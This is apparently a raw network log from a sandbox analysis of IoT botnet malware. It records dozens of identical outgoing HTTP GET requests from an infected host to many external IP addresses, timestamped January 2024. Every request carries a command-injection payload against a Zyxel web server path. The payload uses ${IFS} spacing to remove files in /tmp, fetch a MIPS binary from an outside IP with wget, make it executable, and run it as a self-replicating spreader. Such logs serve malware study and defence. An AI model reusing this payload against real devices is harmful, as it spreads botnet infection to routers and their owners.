                                        Jan 14, 2024 16:18:00.945307970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        211192.168.2.1336644205.251.77.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945333004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        212192.168.2.1343366112.205.146.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945415020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        213192.168.2.133307280.214.144.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945415020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        214192.168.2.135428477.66.158.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945492029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        215192.168.2.1348716222.219.32.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945519924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        216192.168.2.1350302191.235.236.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945584059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        217192.168.2.1349992170.25.129.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945600986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        218192.168.2.135813643.188.244.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945641041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        219192.168.2.1360170161.6.209.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945708036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        220192.168.2.135524235.215.232.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945729971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        221192.168.2.1359814184.38.252.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945799112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        222192.168.2.1351946222.127.38.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945830107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        223192.168.2.134250863.64.177.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945873976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        224192.168.2.1342852172.178.212.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945935965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        225192.168.2.135280268.150.217.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945988894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        226192.168.2.1357662184.9.173.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945995092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        227192.168.2.1342820216.78.89.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946022987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        228192.168.2.134330023.192.7.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946065903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        229192.168.2.135969648.230.131.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946120977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        230192.168.2.133522827.118.253.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946163893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        231192.168.2.135808870.131.171.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946192980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        232192.168.2.1336444160.50.57.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946249008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        233192.168.2.134626668.64.73.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946307898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        234192.168.2.1359888194.209.23.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946335077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        235192.168.2.1345030147.25.200.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946382046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        236192.168.2.1343668208.207.27.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946410894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        237192.168.2.1335424150.137.152.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946434021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        238192.168.2.1348460151.251.252.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946475029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        239192.168.2.135105861.226.89.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.946501970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        240192.168.2.1341884186.150.187.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:01.939912081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        241192.168.2.1344692221.177.0.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:01.940006971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        242192.168.2.135621849.34.67.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:01.940068960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        243192.168.2.1356136195.189.163.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:01.940099955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        244192.168.2.134394882.220.70.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:01.940196991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        245192.168.2.134867895.182.175.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.972923994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        246192.168.2.1352952204.143.187.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.972932100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        247192.168.2.133759874.61.153.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.972975016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        248192.168.2.135172286.66.243.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.972985029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        249192.168.2.1358840203.247.82.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.973026991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        250192.168.2.1340130102.20.7.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.973153114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        251192.168.2.135900244.159.153.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.973185062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        252192.168.2.1348634193.86.14.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.973227978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        253192.168.2.1341402152.20.71.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.973234892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        254192.168.2.1347242124.199.142.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:02.973273993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        255192.168.2.1357102165.146.15.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:03.977099895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        256192.168.2.1338630212.233.199.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:03.977129936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        257192.168.2.1357044136.166.214.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:03.977159023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        258192.168.2.1350982138.207.185.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:03.977216959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        259192.168.2.1339394151.6.206.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:03.977240086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        260192.168.2.1343060109.215.29.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:03.977370024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        261192.168.2.1352692185.28.61.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:03.977401972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        262192.168.2.1339128130.187.251.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:05.987880945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        263192.168.2.135403265.202.78.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:05.987955093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        264192.168.2.1357116176.77.201.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:05.987998962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        265192.168.2.1349034189.107.152.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:06.993221998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        266192.168.2.1349262183.25.251.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:06.993264914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        267192.168.2.134902413.1.250.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:06.993315935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        268192.168.2.135414074.95.159.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:06.993356943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        269192.168.2.134094685.229.104.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:06.993500948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        270192.168.2.1346738120.114.15.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:06.993623972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        271192.168.2.1353538171.119.10.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:07.998493910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        272192.168.2.1349118160.133.72.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:07.998569012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        273192.168.2.1353270168.88.26.239443
                                        TimestampBytes transferredDirectionData
